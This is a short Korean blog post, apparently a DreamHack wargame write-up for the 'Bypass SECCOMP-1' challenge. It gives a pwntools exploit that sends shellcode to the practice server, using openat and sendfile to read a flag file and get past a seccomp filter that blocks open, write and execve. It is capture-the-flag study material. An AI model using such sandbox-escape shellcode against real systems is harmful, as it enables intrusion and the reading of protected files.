Bypass SECCOMP-1 본문
해당 내용은 로드맵에 있는 문제로
새로운 방법을 알게 되어 포스팅을 했다.
exploit code
from pwn import *
context.arch = 'x86_64'
p = remote('host1.dreamhack.games' , 8982)
shellcode = shellcraft.openat(0, "/home/bypass_syscall/flag")
shellcode += shellcraft.sendfile(1, 'rax', 0, 0xffffffff)
p.sendline(asm(shellcode))
p.interactive()
해당 문제는
sandbox seccomp가 걸려있다.
open, write, exceve함수는 사용할 수 없다.
그래서 비슷한 함수인 openat, sendfile을 사용 했다.
'wargame > DreamHack' 카테고리의 다른 글
pwn_patch_1 (0) | 2022.02.17 |
---|---|
Inject ME!!! (0) | 2022.02.16 |
baseball (0) | 2022.02.03 |
hash-bronws (0) | 2022.02.03 |
tiny backdoor (0) | 2022.02.01 |
Comments